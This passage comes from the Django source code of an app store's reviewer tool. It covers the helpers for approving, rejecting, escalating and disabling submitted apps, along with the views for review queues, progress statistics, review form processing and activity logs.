# Failsafe.
return
# Hold onto the status before we change it.
status = self.addon.status
if self.addon.make_public == amo.PUBLIC_IMMEDIATELY:
self._process_public_immediately()
else:
self._process_public_waiting()
if self.in_escalate:
EscalationQueue.objects.filter(addon=self.addon).delete()
# Clear priority_review flag on approval - its not persistant.
if self.addon.priority_review:
self.addon.update(priority_review=False)
# Assign reviewer incentive scores.
return ReviewerScore.award_points(self.request.amo_user, self.addon,
status)
def _process_public_waiting(self):
"""Make an app public waiting."""
if self.addon.has_incomplete_status():
# Failsafe.
return
self.addon.sign_if_packaged(self.version.pk)
self.set_files(amo.STATUS_PUBLIC_WAITING, self.version.files.all())
if self.addon.status != amo.STATUS_PUBLIC:
self.set_addon(status=amo.STATUS_PUBLIC_WAITING,
highest_status=amo.STATUS_PUBLIC_WAITING)
self.set_reviewed()
self.create_note(amo.LOG.APPROVE_VERSION_WAITING)
self.notify_email('pending_to_public_waiting',
u'App approved but waiting: %s')
log.info(u'Making %s public but pending' % self.addon)
def _process_public_immediately(self):
"""Changes status to Public."""
if self.addon.has_incomplete_status():
# Failsafe.
return
self.addon.sign_if_packaged(self.version.pk)
# Save files first, because set_addon checks to make sure there
# is at least one public file or it won't make the addon public.
self.set_files(amo.STATUS_PUBLIC, self.version.files.all())
if self.addon.status != amo.STATUS_PUBLIC:
self.set_addon(status=amo.STATUS_PUBLIC,
highest_status=amo.STATUS_PUBLIC)
self.set_reviewed()
# Note: Post save signals shouldn't happen here. All the set_*()
# methods pass _signal=False to prevent them from being sent. They are
# manually triggered in the view after the transaction is committed to
# avoid multiple indexing tasks getting fired with stale data.
#
# This does mean that we need to call update_version() manually to get
# the addon in the correct state before updating names. We do that,
# passing _signal=False again to prevent it from sending
# 'version_changed'. The post_save() that happen in the view will
# call it without that parameter, sending 'version_changed' normally.
self.addon.update_version(_signal=False)
self.addon.update_name_from_package_manifest()
self.addon.update_supported_locales()
self.addon.resend_version_changed_signal = True
if waffle.switch_is_active('iarc'):
self.addon.set_iarc_storefront_data()
self.create_note(amo.LOG.APPROVE_VERSION)
self.notify_email('pending_to_public', u'App approved: %s')
log.info(u'Making %s public' % self.addon)
def process_reject(self):
"""
Reject an app.
Changes status to Rejected.
Creates Rejection note/email.
"""
# Hold onto the status before we change it.
status = self.addon.status
self.set_files(amo.STATUS_DISABLED, self.version.files.all(),
hide_disabled_file=True)
# If this app is not packaged (packaged apps can have multiple
# versions) or if there aren't other versions with already reviewed
# files, reject the app also.
if (not self.addon.is_packaged or
not self.addon.versions.exclude(id=self.version.id)
.filter(files__status__in=amo.REVIEWED_STATUSES).exists()):
self.set_addon(status=amo.STATUS_REJECTED)
if self.in_escalate:
EscalationQueue.objects.filter(addon=self.addon).delete()
if self.in_rereview:
RereviewQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.REJECT_VERSION)
self.notify_email('pending_to_sandbox',
u'Your submission has been rejected: %s')
log.info(u'Making %s disabled' % self.addon)
# Assign reviewer incentive scores.
return ReviewerScore.award_points(self.request.amo_user, self.addon,
status, in_rereview=self.in_rereview)
def process_escalate(self):
"""
Ask for escalation for an app (EscalationQueue).
Doesn't change status.
Creates Escalation note/email.
"""
EscalationQueue.objects.get_or_create(addon=self.addon)
self.create_note(amo.LOG.ESCALATE_MANUAL)
log.info(u'Escalated review requested for %s' % self.addon)
self.notify_email('author_super_review', u'Submission Update: %s')
log.info(u'Escalated review requested for %s' % self.addon)
# Special senior reviewer email.
if not waffle.switch_is_active('comm-dashboard'):
data = self.get_context_data()
send_mail(u'Escalated Review Requested: %s' % data['name'],
'reviewers/emails/super_review.txt', data,
[settings.MKT_SENIOR_EDITORS_EMAIL],
attachments=self.get_attachments())
def process_comment(self):
"""
Editor comment (not visible to developer).
Doesn't change status.
Creates Reviewer Comment note/email.
"""
self.version.update(has_editor_comment=True)
self.create_note(amo.LOG.COMMENT_VERSION)
def process_clear_escalation(self):
"""
Clear app from escalation queue.
Doesn't change status.
Doesn't create note/email.
"""
EscalationQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.ESCALATION_CLEARED)
log.info(u'Escalation cleared for app: %s' % self.addon)
def process_clear_rereview(self):
"""
Clear app from re-review queue.
Doesn't change status.
Doesn't create note/email.
"""
RereviewQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.REREVIEW_CLEARED)
log.info(u'Re-review cleared for app: %s' % self.addon)
# Assign reviewer incentive scores.
return ReviewerScore.award_points(self.request.amo_user, self.addon,
self.addon.status, in_rereview=True)
def process_disable(self):
"""
Disables app, clears app from all queues.
Changes status to Disabled.
Creates Disabled note/email.
"""
if not acl.action_allowed(self.request, 'Apps', 'Edit'):
return
# Disable disables all files, not just those in this version.
self.set_files(amo.STATUS_DISABLED,
File.objects.filter(version__addon=self.addon),
hide_disabled_file=True)
self.addon.update(status=amo.STATUS_DISABLED)
if self.in_escalate:
EscalationQueue.objects.filter(addon=self.addon).delete()
if self.in_rereview:
RereviewQueue.objects.filter(addon=self.addon).delete()
self.addon.set_iarc_storefront_data(disable=True)
self.notify_email('disabled', u'App disabled by reviewer: %s')
self.create_note(amo.LOG.APP_DISABLED)
log.info(u'App %s has been disabled by a reviewer.' % self.addon)
class ReviewHelper(object):
"""
A class that builds enough to render the form back to the user and
process off to the correct handler.
"""
def __init__(self, request=None, addon=None, version=None,
attachment_formset=None):
self.handler = None
self.required = {}
self.addon = addon
self.version = version
self.all_files = version and version.files.all()
self.attachment_formset = attachment_formset
self.get_review_type(request, addon, version)
self.actions = self.get_actions()
def set_data(self, data):
self.handler.set_data(data)
def get_review_type(self, request, addon, version):
if EscalationQueue.objects.filter(addon=addon).exists():
queue = 'escalated'
elif RereviewQueue.objects.filter(addon=addon).exists():
queue = 'rereview'
else:
queue = 'pending'
self.review_type = queue
self.handler = ReviewApp(request, addon, version, queue,
attachment_formset=self.attachment_formset)
def get_actions(self):
"""Get the appropriate handler based on the action."""
public = {
'method': self.handler.process_public,
'minimal': False,
'label': _lazy(u'Push to public'),
'details': _lazy(u'This will approve the sandboxed app so it '
u'appears on the public side.')}
reject = {
'method': self.handler.process_reject,
'label': _lazy(u'Reject'),
'minimal': False,
'details': _lazy(u'This will reject the app and remove it from '
u'the review queue.')}
info = {
'method': self.handler.request_information,
'label': _lazy(u'Request more information'),
'minimal': True,
'details': _lazy(u'This will send the author(s) an email '
u'requesting more information.')}
escalate = {
'method': self.handler.process_escalate,
'label': _lazy(u'Escalate'),
'minimal': True,
'details': _lazy(u'Flag this app for an admin to review.')}
comment = {
'method': self.handler.process_comment,
'label': _lazy(u'Comment'),
'minimal': True,
'details': _lazy(u'Make a comment on this app. The author won\'t '
u'be able to see this.')}
clear_escalation = {
'method': self.handler.process_clear_escalation,
'label': _lazy(u'Clear Escalation'),
'minimal': True,
'details': _lazy(u'Clear this app from the escalation queue. The '
u'author will get no email or see comments '
u'here.')}
clear_rereview = {
'method': self.handler.process_clear_rereview,
'label': _lazy(u'Clear Re-review'),
'minimal': True,
'details': _lazy(u'Clear this app from the re-review queue. The '
u'author will get no email or see comments '
u'here.')}
disable = {
'method': self.handler.process_disable,
'label': _lazy(u'Disable app'),
'minimal': True,
'details': _lazy(u'Disable the app, removing it from public '
u'results. Sends comments to author.')}
actions = SortedDict()
if not self.version:
# Return early if there is no version, this app is incomplete.
actions['info'] = info
actions['comment'] = comment
return actions
file_status = self.version.files.values_list('status', flat=True)
multiple_versions = (File.objects.exclude(version=self.version)
.filter(
version__addon=self.addon,
status__in=amo.REVIEWED_STATUSES)
.exists())
show_privileged = (not self.version.is_privileged
or acl.action_allowed(self.handler.request, 'Apps',
'ReviewPrivileged'))
# Public.
if ((self.addon.is_packaged and amo.STATUS_PUBLIC not in file_status
and show_privileged)
or (not self.addon.is_packaged and
self.addon.status != amo.STATUS_PUBLIC)):
actions['public'] = public
# Reject.
if self.addon.is_packaged and show_privileged:
# Packaged apps reject the file only, or the app itself if there's
# only a single version.
if (not multiple_versions and
self.addon.status not in [amo.STATUS_REJECTED,
amo.STATUS_DISABLED]):
actions['reject'] = reject
elif multiple_versions and amo.STATUS_DISABLED not in file_status:
actions['reject'] = reject
elif not self.addon.is_packaged:
# Hosted apps reject the app itself.
if self.addon.status not in [amo.STATUS_REJECTED,
amo.STATUS_DISABLED]:
actions['reject'] = reject
# Disable.
if (acl.action_allowed(self.handler.request, 'Apps', 'Edit') and (
self.addon.status != amo.STATUS_DISABLED or
amo.STATUS_DISABLED not in file_status)):
actions['disable'] = disable
# Clear escalation.
if self.handler.in_escalate:
actions['clear_escalation'] = clear_escalation
# Clear re-review.
if self.handler.in_rereview:
actions['clear_rereview'] = clear_rereview
# Escalate.
if not self.handler.in_escalate:
actions['escalate'] = escalate
# Request info and comment are always shown.
actions['info'] = info
actions['comment'] = comment
return actions
def process(self):
"""Call handler."""
action = self.handler.data.get('action', '')
if not action:
raise NotImplementedError
return self.actions[action]['method']()
def clean_sort_param(request, date_sort='created'):
"""
Handles empty and invalid values for sort and sort order
'created' by ascending is the default ordering.
"""
sort = request.GET.get('sort', date_sort)
order = request.GET.get('order', 'asc')
if sort not in ('name', 'created', 'nomination', 'num_abuse_reports'):
sort = date_sort
if order not in ('desc', 'asc'):
order = 'asc'
return sort, order
def create_sort_link(pretty_name, sort_field, get_params, sort, order):
"""Generate table header sort links.
pretty_name -- name displayed on table header
sort_field -- name of the sort_type GET parameter for the column
get_params -- additional get_params to include in the sort_link
sort -- the current sort type
order -- the current sort order
"""
get_params.append(('sort', sort_field))
if sort == sort_field and order == 'asc':
# Have link reverse sort order to desc if already sorting by desc.
get_params.append(('order', 'desc'))
else:
# Default to ascending.
get_params.append(('order', 'asc'))
# Show little sorting sprite if sorting by this field.
url_class = ''
if sort == sort_field:
url_class = ' class="sort-icon ed-sprite-sort-%s"' % order
return u'<a href="?%s"%s>%s</a>' % (urllib.urlencode(get_params, True),
url_class, pretty_name)
class AppsReviewing(object):
"""
Class to manage the list of apps a reviewer is currently reviewing.
Data is stored in memcache.
"""
def __init__(self, request):
self.request = request
self.user_id = request.amo_user.id
self.key = '%s:myapps:%s' % (settings.CACHE_PREFIX, self.user_id)
def get_apps(self):
ids = []
my_apps = cache.get(self.key)
if my_apps:
for id in my_apps.split(','):
valid = cache.get(
'%s:review_viewing:%s' % (settings.CACHE_PREFIX, id))
if valid and valid == self.user_id:
ids.append(id)
apps = []
for app in Webapp.objects.filter(id__in=ids):
apps.append({
'app': app,
'app_attrs': json.dumps(
product_as_dict(self.request, app, False, 'reviewer'),
cls=JSONEncoder),
})
return apps
def add(self, addon_id):
my_apps = cache.get(self.key)
if my_apps:
apps = my_apps.split(',')
else:
apps = []
apps.append(addon_id)
cache.set(self.key, ','.join(map(str, set(apps))),
amo.EDITOR_VIEWING_INTERVAL * 2)
def device_queue_search(request):
"""
Returns a queryset that can be used as a base for searching the device
specific queue.
"""
filters = {
'type': amo.ADDON_WEBAPP,
'status': amo.STATUS_PENDING,
'disabled_by_user': False,
}
sig = request.GET.get('pro')
if sig:
profile = FeatureProfile.from_signature(sig)
filters.update(dict(
**profile.to_kwargs(prefix='_current_version__features__has_')
))
return Webapp.version_and_file_transformer(
Webapp.objects.filter(**filters))
########NEW FILE########
__FILENAME__ = views
import collections
import datetime
import functools
import HTMLParser
import json
import os
import sys
import traceback
import urllib
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import Count, Q
from django.db.models.signals import post_save
from django.shortcuts import get_object_or_404, redirect, render
import commonware.log
import jinja2
import requests
from elasticutils import F
from rest_framework.exceptions import ParseError
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.response import Response
from tower import ugettext as _
from waffle.decorators import waffle_switch
import amo
from abuse.models import AbuseReport
from access import acl
from addons.decorators import addon_view
from addons.models import AddonDeviceType, Version
from addons.signals import version_changed
from amo.decorators import (any_permission_required, json_view,
permission_required)
from amo.helpers import absolutify, urlparams
from amo.models import manual_order
from amo.utils import (escape_all, HttpResponseSendFile, JSONEncoder, paginate,
redirect_for_login, smart_decode)
from cache_nuggets.lib import Token
from devhub.models import ActivityLog, ActivityLogAttachment
from editors.forms import MOTDForm
from editors.models import (EditorSubscription, EscalationQueue, RereviewQueue,
ReviewerScore)
from editors.views import reviewer_required
from files.models import File
from lib.crypto.packaged import SigningError
from reviews.models import Review, ReviewFlag
from tags.models import Tag
from translations.query import order_by_translation
from users.models import UserProfile
from zadmin.models import set_config, unmemoized_get_config
import mkt
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import GroupPermission
from mkt.api.base import SlugOrIdMixin
from mkt.comm.forms import CommAttachmentFormSet
from mkt.ratings.forms import ReviewFlagFormSet
from mkt.regions.utils import parse_region
from mkt.reviewers.forms import ApiReviewersSearchForm, ApproveRegionForm
from mkt.reviewers.serializers import (ReviewersESAppSerializer,
ReviewingSerializer)
from mkt.reviewers.utils import (AppsReviewing, clean_sort_param,
device_queue_search)
from mkt.search.utils import S
from mkt.search.views import SearchView
from mkt.site import messages
from mkt.site.helpers import product_as_dict
from mkt.submit.forms import AppFeaturesForm
from mkt.webapps.models import Webapp, WebappIndexer
from . import forms
from .models import AppCannedResponse
QUEUE_PER_PAGE = 100
log = commonware.log.getLogger('z.reviewers')
@reviewer_required
def route_reviewer(request):
"""
Redirect to apps home page if app reviewer.
"""
return http.HttpResponseRedirect(reverse('reviewers.home'))
@reviewer_required(only='app')
def home(request):
durations = (('new', _('New Apps (Under 5 days)')),
('med', _('Passable (5 to 10 days)')),
('old', _('Overdue (Over 10 days)')))
progress, percentage = _progress()
data = context(
request,
reviews_total=ActivityLog.objects.total_reviews(webapp=True)[:5],
reviews_monthly=ActivityLog.objects.monthly_reviews(webapp=True)[:5],
#new_editors=EventLog.new_editors(), # Bug 747035
#eventlog=ActivityLog.objects.editor_events()[:6], # Bug 746755
progress=progress,
percentage=percentage,
durations=durations
)
return render(request, 'reviewers/home.html', data)
def queue_counts(request):
excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
flat=True)
public_statuses = amo.WEBAPPS_APPROVED_STATUSES
counts = {
'pending': Webapp.objects.no_cache()
.exclude(id__in=excluded_ids)
.filter(type=amo.ADDON_WEBAPP,
disabled_by_user=False,
status=amo.STATUS_PENDING)
.count(),
'rereview': RereviewQueue.objects.no_cache()
.exclude(addon__in=excluded_ids)
.filter(addon__disabled_by_user=False)
.count(),
# This will work as long as we disable files of existing unreviewed
# versions when a new version is uploaded.
'updates': File.objects.no_cache()
.exclude(version__addon__id__in=excluded_ids)
.filter(version__addon__type=amo.ADDON_WEBAPP,
version__addon__disabled_by_user=False,
version__addon__is_packaged=True,
version__addon__status__in=public_statuses,
version__deleted=False,
status=amo.STATUS_PENDING)
.count(),
'escalated': EscalationQueue.objects.no_cache()
.filter(addon__disabled_by_user=False)
.count(),
'moderated': Review.objects.no_cache().filter(
addon__type=amo.ADDON_WEBAPP,
reviewflag__isnull=False,
editorreview=True)
.count(),
'region_cn': Webapp.objects.pending_in_region(mkt.regions.CN).count(),
}
if 'pro' in request.GET:
counts.update({'device': device_queue_search(request).count()})
rv = {}
if isinstance(type, basestring):
return counts[type]
for k, v in counts.items():
if not isinstance(type, list) or k in type:
rv[k] = v
return rv
def _progress():
"""Returns unreviewed apps progress.
Return the number of apps still unreviewed for a given period of time and
the percentage.
"""
days_ago = lambda n: datetime.datetime.now() - datetime.timedelta(days=n)
excluded_ids = EscalationQueue.objects.values_list('addon', flat=True)
public_statuses = amo.WEBAPPS_APPROVED_STATUSES
base_filters = {
'pending': (Webapp.objects.rated()
.exclude(id__in=excluded_ids)
.filter(status=amo.STATUS_PENDING,
disabled_by_user=False,
_latest_version__deleted=False),
'_latest_version__nomination'),
'rereview': (RereviewQueue.objects
.exclude(addon__in=excluded_ids)
.filter(addon__disabled_by_user=False),
'created'),
'escalated': (EscalationQueue.objects
.filter(addon__disabled_by_user=False),
'created'),
'updates': (File.objects
.exclude(version__addon__id__in=excluded_ids)
.filter(version__addon__type=amo.ADDON_WEBAPP,
version__addon__disabled_by_user=False,
version__addon__is_packaged=True,
version__addon__status__in=public_statuses,
version__deleted=False,
status=amo.STATUS_PENDING),
'version__nomination')
}
operators_and_values = {
'new': ('gt', days_ago(5)),
'med': ('range', (days_ago(10), days_ago(5))),
'old': ('lt', days_ago(10)),
'week': ('gte', days_ago(7))
}
types = base_filters.keys()
progress = {}
for t in types:
tmp = {}
base_query, field = base_filters[t]
for k in operators_and_values.keys():
operator, value = operators_and_values[k]
filter_ = {}
filter_['%s__%s' % (field, operator)] = value
tmp[k] = base_query.filter(**filter_).count()
progress[t] = tmp
# Return the percent of (p)rogress out of (t)otal.
pct = lambda p, t: (p / float(t)) * 100 if p > 0 else 0
percentage = {}
for t in types:
total = progress[t]['new'] + progress[t]['med'] + progress[t]['old']
percentage[t] = {}
for duration in ('new', 'med', 'old'):
percentage[t][duration] = pct(progress[t][duration], total)
return (progress, percentage)
def context(request, **kw):
statuses = dict((k, unicode(v)) for k, v in amo.STATUS_CHOICES_API.items())
ctx = dict(motd=unmemoized_get_config('mkt_reviewers_motd'),
queue_counts=queue_counts(request),
search_url=reverse('reviewers-search-api'),
statuses=statuses, point_types=amo.REVIEWED_MARKETPLACE)
ctx.update(kw)
return ctx
def _review(request, addon, version):
if (not settings.ALLOW_SELF_REVIEWS and
not acl.action_allowed(request, 'Admin', '%') and
addon.has_author(request.amo_user)):
messages.warning(request, _('Self-reviews are not allowed.'))
return redirect(reverse('reviewers.home'))
if (addon.status == amo.STATUS_BLOCKED and
not acl.action_allowed(request, 'Apps', 'ReviewEscalated')):
messages.warning(
request, _('Only senior reviewers can review blocklisted apps.'))
return redirect(reverse('reviewers.home'))
attachment_formset = CommAttachmentFormSet(data=request.POST or None,
files=request.FILES or None,
prefix='attachment')
form = forms.get_review_form(data=request.POST or None,
files=request.FILES or None, request=request,
addon=addon, version=version,
attachment_formset=attachment_formset)
postdata = request.POST if request.method == 'POST' else None
all_forms = [form, attachment_formset]
if version:
features_list = [unicode(f) for f in version.features.to_list()]
appfeatures_form = AppFeaturesForm(data=postdata,
instance=version.features)
all_forms.append(appfeatures_form)
else:
appfeatures_form = None
features_list = None
queue_type = form.helper.review_type
redirect_url = reverse('reviewers.apps.queue_%s' % queue_type)
is_admin = acl.action_allowed(request, 'Apps', 'Edit')
if request.method == 'POST' and all(f.is_valid() for f in all_forms):
old_types = set(o.id for o in addon.device_types)
new_types = set(form.cleaned_data.get('device_override'))
old_features = set(features_list)
new_features = set(unicode(f) for f
in appfeatures_form.instance.to_list())
if form.cleaned_data.get('action') == 'public':
if old_types != new_types:
# The reviewer overrode the device types. We need to not
# publish this app immediately.
if addon.make_public == amo.PUBLIC_IMMEDIATELY:
addon.update(make_public=amo.PUBLIC_WAIT)
# And update the device types to what the reviewer set.
AddonDeviceType.objects.filter(addon=addon).delete()
for device in form.cleaned_data.get('device_override'):
addon.addondevicetype_set.create(device_type=device)
# Log that the reviewer changed the device types.
added_devices = new_types - old_types
removed_devices = old_types - new_types
msg = _(u'Device(s) changed by '
'reviewer: {0}').format(', '.join(
[_(u'Added {0}').format(unicode(amo.DEVICE_TYPES[d].name))
for d in added_devices] +
[_(u'Removed {0}').format(
unicode(amo.DEVICE_TYPES[d].name))
for d in removed_devices]))
amo.log(amo.LOG.REVIEW_DEVICE_OVERRIDE, addon,
addon.current_version, details={'comments': msg})
if old_features != new_features:
# The reviewer overrode the requirements. We need to not
# publish this app immediately.
if addon.make_public == amo.PUBLIC_IMMEDIATELY:
addon.update(make_public=amo.PUBLIC_WAIT)
appfeatures_form.save(mark_for_rereview=False)
# Log that the reviewer changed the minimum requirements.
added_features = new_features - old_features
removed_features = old_features - new_features
fmt = ', '.join(
[_(u'Added {0}').format(f) for f in added_features] +
[_(u'Removed {0}').format(f) for f in removed_features])
# L10n: {0} is the list of requirements changes.
msg = _(u'Requirements changed by reviewer: {0}').format(fmt)
amo.log(amo.LOG.REVIEW_FEATURES_OVERRIDE, addon,
addon.current_version, details={'comments': msg})
score = form.helper.process()
if form.cleaned_data.get('notify'):
# TODO: bug 741679 for implementing notifications in Marketplace.
EditorSubscription.objects.get_or_create(user=request.amo_user,
addon=addon)
is_tarako = form.cleaned_data.get('is_tarako', False)
if is_tarako:
Tag(tag_text='tarako').save_tag(addon)
else:
Tag(tag_text='tarako').remove_tag(addon)
# Success message.
if score:
score = ReviewerScore.objects.filter(user=request.amo_user)[0]
# L10N: {0} is the type of review. {1} is the points they earned.
# {2} is the points they now have total.
success = _(
u'"{0}" successfully processed (+{1} points, {2} total).'
.format(unicode(amo.REVIEWED_CHOICES[score.note_key]),
score.score,
ReviewerScore.get_total(request.amo_user)))
else:
success = _('Review successfully processed.')
messages.success(request, success)
return redirect(redirect_url)
canned = AppCannedResponse.objects.all()
actions = form.helper.actions.items()
try:
if not version:
raise Version.DoesNotExist
show_diff = (addon.versions.exclude(id=version.id)
.filter(files__isnull=False,
created__lt=version.created,
files__status=amo.STATUS_PUBLIC)
.latest())
except Version.DoesNotExist:
show_diff = None
# The actions we should show a minimal form from.
actions_minimal = [k for (k, a) in actions if not a.get('minimal')]
# We only allow the user to check/uncheck files for "pending"
allow_unchecking_files = form.helper.review_type == "pending"
versions = (Version.with_deleted.filter(addon=addon)
.order_by('-created')
.transform(Version.transformer_activity)
.transform(Version.transformer))
product_attrs = {
'product': json.dumps(
product_as_dict(request, addon, False, 'reviewer'),
cls=JSONEncoder),
'manifest_url': addon.manifest_url,
}
pager = paginate(request, versions, 10)
num_pages = pager.paginator.num_pages
count = pager.paginator.count
ctx = context(request, version=version, product=addon, pager=pager,
num_pages=num_pages, count=count,
form=form, canned=canned, is_admin=is_admin,
status_types=amo.MKT_STATUS_CHOICES, show_diff=show_diff,
allow_unchecking_files=allow_unchecking_files,
actions=actions, actions_minimal=actions_minimal,
tab=queue_type, product_attrs=product_attrs,
attachment_formset=attachment_formset,
appfeatures_form=appfeatures_form)
if features_list is not None:
ctx['feature_list'] = features_list
return render(request, 'reviewers/review.html', ctx)
@transaction.commit_manually
@reviewer_required(only='app')
@addon_view
def app_review(request, addon):
version = addon.latest_version
resp = None
try:
resp = _review(request, addon, version)
except SigningError, exc:
transaction.rollback()
messages.error(request, 'Signing Error: %s' % exc)
transaction.commit()
return redirect(
reverse('reviewers.apps.review', args=[addon.app_slug]))
except Exception:
transaction.rollback()
raise
else:
transaction.commit()
# We (hopefully) have been avoiding sending send post_save and
# version_changed signals in the review process till now (_review()
# uses ReviewHelper which should have done all of its update() calls
# with _signal=False).
#
# Now is a good time to send them: the transaction we were in has been
# committed, so we know everything is ok. This is important: we need
# them to index the app or call update_version() if that wasn't done
# before already.
if request.method == 'POST':
try:
post_save.send(sender=Webapp, instance=addon, created=False)
post_save.send(sender=Version, instance=version, created=False)
if getattr(addon, 'resend_version_changed_signal', False):
version_changed.send(sender=addon)
del addon.resend_version_changed_signal
except Exception:
transaction.rollback()
raise
else:
transaction.commit()
if resp:
return resp
raise
QueuedApp = collections.namedtuple('QueuedApp', 'app created')
def _queue(request, apps, tab, pager_processor=None, date_sort='created',
template='reviewers/queue.html', data=None):
per_page = request.GET.get('per_page', QUEUE_PER_PAGE)
pager = paginate(request, apps, per_page)
ctx = {
'addons': pager.object_list,
'pager': pager,
'tab': tab,
'search_form': _get_search_form(request),
'date_sort': date_sort
}
# Additional context variables.
if data is not None:
ctx.update(data)
return render(request, template, context(request, **ctx))
def _do_sort(request, qs, date_sort='created'):
"""Returns sorted Webapp queryset."""
if qs.model is Webapp:
return _do_sort_webapp(request, qs, date_sort)
return _do_sort_queue_obj(request, qs, date_sort)
def _do_sort_webapp(request, qs, date_sort):
"""
Column sorting logic based on request GET parameters.
"""
sort_type, order = clean_sort_param(request, date_sort=date_sort)
order_by = ('-' if order == 'desc' else '') + sort_type
# Sort.
if sort_type == 'name':
# Sorting by name translation.
return order_by_translation(qs, order_by)
elif sort_type == 'num_abuse_reports':
return (qs.annotate(num_abuse_reports=Count('abuse_reports'))
.order_by(order_by))
else:
return qs.order_by('-priority_review', order_by)
def _do_sort_queue_obj(request, qs, date_sort):
"""
Column sorting logic based on request GET parameters.
Deals with objects with joins on the Addon (e.g. RereviewQueue, Version).
Returns qs of apps.
"""
sort_type, order = clean_sort_param(request, date_sort=date_sort)
sort_str = sort_type
if sort_type not in [date_sort, 'name']:
sort_str = 'addon__' + sort_type
# sort_str includes possible joins when ordering.
# sort_type is the name of the field to sort on without desc/asc markers.
# order_by is the name of the field to sort on with desc/asc markers.
order_by = ('-' if order == 'desc' else '') + sort_str
# Sort.
if sort_type == 'name':
# Sorting by name translation through an addon foreign key.
return order_by_translation(
Webapp.objects.filter(id__in=qs.values_list('addon', flat=True)),
order_by)
elif sort_type == 'num_abuse_reports':
qs = qs.annotate(num_abuse_reports=Count('abuse_reports'))
# Convert sorted queue object queryset to sorted app queryset.
sorted_app_ids = (qs.order_by('-addon__priority_review', order_by)
.values_list('addon', flat=True))
qs = Webapp.objects.filter(id__in=sorted_app_ids)
return manual_order(qs, sorted_app_ids, 'addons.id')
@reviewer_required(only='app')
def queue_apps(request):
excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
flat=True)
qs = (Version.objects.no_cache().filter(
files__status=amo.STATUS_PENDING, addon__type=amo.ADDON_WEBAPP,
addon__disabled_by_user=False,
addon__status=amo.STATUS_PENDING)
.exclude(addon__id__in=excluded_ids)
.order_by('nomination', 'created')
.select_related('addon', 'files').no_transforms())
apps = _do_sort(request, qs, date_sort='nomination')
apps = [QueuedApp(app, app.all_versions[0].nomination)
for app in Webapp.version_and_file_transformer(apps)]
return _queue(request, apps, 'pending', date_sort='nomination')
@reviewer_required(only='app')
def queue_region(request, region=None):
# TODO: Create a landing page that lists all the special regions.
if region is None:
raise http.Http404
region = parse_region(region)
column = '_geodata__region_%s_nominated' % region.slug
qs = Webapp.objects.pending_in_region(region)
apps = _do_sort(request, qs, date_sort=column)
apps = [QueuedApp(app, app.geodata.get_nominated_date(region))
for app in apps]
return _queue(request, apps, 'region', date_sort=column,
template='reviewers/queue_region.html',
data={'region': region})
@reviewer_required(only='app')
def queue_rereview(request):
excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
flat=True)
rqs = (RereviewQueue.objects.no_cache()
.filter(addon__type=amo.ADDON_WEBAPP,
addon__disabled_by_user=False)
.exclude(addon__in=excluded_ids))
apps = _do_sort(request, rqs)
apps = [QueuedApp(app, app.rereviewqueue_set.all()[0].created)
for app in apps]
return _queue(request, apps, 'rereview')
@permission_required('Apps', 'ReviewEscalated')
def queue_escalated(request):
eqs = EscalationQueue.objects.no_cache().filter(
addon__type=amo.ADDON_WEBAPP, addon__disabled_by_user=False)
apps = _do_sort(request, eqs)
apps = [QueuedApp(app, app.escalationqueue_set.all()[0].created)
for app in apps]
return _queue(request, apps, 'escalated')
@reviewer_required(only='app')
def queue_updates(request):
excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
flat=True)
qs = (Version.objects.no_cache().filter(
files__status=amo.STATUS_PENDING,
addon__type=amo.ADDON_WEBAPP,
addon__disabled_by_user=False,
addon__status__in=amo.WEBAPPS_APPROVED_STATUSES)
.exclude(addon__id__in=excluded_ids)
.order_by('nomination', 'created')
.select_related('addon', 'files').no_transforms())
apps = _do_sort(request, qs, date_sort='nomination')
apps = [QueuedApp(app, app.all_versions[0].nomination)
for app in Webapp.version_and_file_transformer(apps)]
return _queue(request, apps, 'updates', date_sort='nomination')
@reviewer_required(only='app')
def queue_device(request):
"""
A device specific queue matching apps which require features that our
device support based on the `profile` query string.
"""
if 'pro' in request.GET:
apps = [QueuedApp(app, app.all_versions[0].nomination)
for app in device_queue_search(request)]
else:
apps = []
return _queue(request, apps, 'device')
@reviewer_required(only='app')
def queue_moderated(request):
"""Queue for reviewing app reviews."""
rf = (Review.objects.no_cache()
.exclude(Q(addon__isnull=True) | Q(reviewflag__isnull=True))
.filter(addon__type=amo.ADDON_WEBAPP, editorreview=True)
.order_by('reviewflag__created'))
page = paginate(request, rf, per_page=20)
flags = dict(ReviewFlag.FLAGS)
reviews_formset = ReviewFlagFormSet(request.POST or None,
queryset=page.object_list,
request=request)
if reviews_formset.is_valid():
reviews_formset.save()
return redirect(reverse('reviewers.apps.queue_moderated'))
return render(request, 'reviewers/queue.html',
context(request, reviews_formset=reviews_formset,
tab='moderated', page=page, flags=flags))
def _get_search_form(request):
form = ApiReviewersSearchForm()
fields = [f.name for f in form.visible_fields() + form.hidden_fields()]
get = dict((k, v) for k, v in request.GET.items() if k in fields)
return ApiReviewersSearchForm(get or None)
@permission_required('Apps', 'Review')
def logs(request):
data = request.GET.copy()
if not data.get('start') and not data.get('end'):
today = datetime.date.today()
data['start'] = datetime.date(today.year, today.month, 1)
form = forms.ReviewAppLogForm(data)
approvals = ActivityLog.objects.review_queue(webapp=True)
if form.is_valid():
data = form.cleaned_data
if data.get('start'):
approvals = approvals.filter(created__gte=data['start'])
if data.get('end'):
approvals = approvals.filter(created__lt=data['end'])
if data.get('search'):
term = data['search']
approvals = approvals.filter(
Q(commentlog__comments__icontains=term) |
Q(applog__addon__name__localized_string__icontains=term) |
Q(applog__addon__app_slug__icontains=term) |
Q(user__display_name__icontains=term) |
Q(user__username__icontains=term)).distinct()
pager = paginate(request, approvals, 50)
data = context(request, form=form, pager=pager, ACTION_DICT=amo.LOG_BY_ID,
tab='apps')
return render(request, 'reviewers/logs.html', data)
@reviewer_required
def motd(request):
form = None
motd = unmemoized_get_config('mkt_reviewers_motd')
if acl.action_allowed(request, 'AppReviewerMOTD', 'Edit'):
form = MOTDForm(request.POST or None, initial={'motd': motd})
